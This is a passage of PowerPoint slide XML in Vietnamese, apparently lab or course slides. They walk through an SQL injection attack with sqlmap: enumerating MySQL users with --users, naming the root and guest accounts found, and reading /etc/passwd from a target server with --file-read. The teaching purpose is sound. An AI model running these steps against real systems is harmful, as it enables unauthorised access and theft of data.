                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Liệt kê các tài khoản người dùng có quyền truy cập vào hệ quản trị cơ sở dữ liệu (DBMS) của Server. Trên Terminal chạy lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6331E7-8F80-D668-15D1-671A4C1E5373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="279236" y="2297029"/>
            <a:ext cx="8585528" cy="1699449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3147344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471C6-5E10-7901-E51D-1998A522EC0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71C63C5-C218-9EF6-48C8-53F5AE37A5D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8EA819E2-935B-0C72-6EFB-6D8E04FA1C4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137</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DE657B-7B6A-61DD-1E8C-56FCBC5E2D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ham số --users yêu cầu sqlmap trích xuất danh sách tất cả người dùng MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C205D6F9-1A74-6B19-335B-BFF51A1AE7E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1265774"/>
            <a:ext cx="6172200" cy="4570723"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36998812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2D885-26DD-149D-0C7A-D0BE8A671D2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8FA26B-B5C6-2EB1-9DC8-1CAFEA2E3C5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03C87596-516C-6BCE-EDFE-1A4222CF604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138</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6B2566F-EDA1-4C5C-2FA2-E6E53B2F9F0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Lệnh sqlmap đã thành công liệt kê 3 tài khoản người dùng DBMS: debian-sys-maint@%, guest@%, và root@%. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8B251A-9439-7142-6994-5E4DA7EEF8F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353820" y="1727439"/>
            <a:ext cx="6436359" cy="4205905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16626019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92D8D-3B8A-D961-7472-21E823EBFB1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EB1236B-014B-C721-1960-803478AA3F8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E888298-50F6-4F5D-EC75-E3E22B95420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139</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDEA29EC-095A-8FC1-7898-AC616EAD3583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Đọc File hệ thống (/etc/passwd)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Yêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> file /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Target Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>kỹ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thuật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Error-based SQL Injection (Error-based LFI).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lênh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44DCE8D-948B-0918-2344-FB8A2C9FC37A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2552700"/>
            <a:ext cx="8754306" cy="2057400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="694832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761D5-DFC0-E491-C962-1F4ABD9824B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0805A64-8EAC-5491-C4FB-1C42E03E577C}"/>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CC18B570-CB91-7042-BBFE-BAA7D6D859FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> bao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>gồm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>giai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>đoạn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cốt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D66E2EB-422D-84C4-10CB-57FAF15909C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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6176CD7-1173-2846-0ABB-7184E5478C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1638300"/>
            <a:ext cx="82296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7. Denial of Service (Từ chối dịch vụ): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tiến hành từ chối các dịch vụ để làm gián đoạn hoạt động của hệ thống mục tiêu.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19448965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B602-A5F4-A599-F03C-22DD2430F62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5480691-71A1-7EB1-B444-1D24A0E15A7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C776298-B06D-0F19-A1DB-8986CFBED08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140</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC919948-5AE1-B86E-379E-C8536AF44298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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--file-read "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/passwd" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>định</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8222143A-2020-3DDC-08C4-254EC1341C46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1612900" y="879603"/>
            <a:ext cx="5918200" cy="4700869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16391569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2F8AA-BBDB-5FE1-E4CB-692F0D62FB5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9983EFA-A3E1-B49C-B0C3-BF313DECFCE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D19B9A54-E17B-E9C7-2E3F-1F207061839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141</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C378BD4-F8F1-13F1-9B73-93194550B5C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="992069" y="25400"/>
            <a:ext cx="7159862" cy="5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7098107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0D13-D63A-22C8-F087-ABBFF8E186B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D217255-C3D8-F4B9-5D5F-F295D7B7F19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6C8C3F6-664D-5DC3-458E-43750DAA0BB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142</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7459A018-3836-158D-FED1-3A55A9BBEACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347320" y="1240374"/>
            <a:ext cx="8449360" cy="5162527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C3E7B5-52DB-417F-CB35-2EE4E91050E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Kết quả cho thấy file được truy xuất với kích thước 1581 B</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3336597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45B16-EF2A-C1F0-1CFA-9839E237B76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174B824-E31E-2D77-1A38-831274BA80F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E4984EE6-5BF6-138F-1C8A-8CEE3D22CD3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143</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8890F3AC-21FB-4CBF-F681-A47431AFAA24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
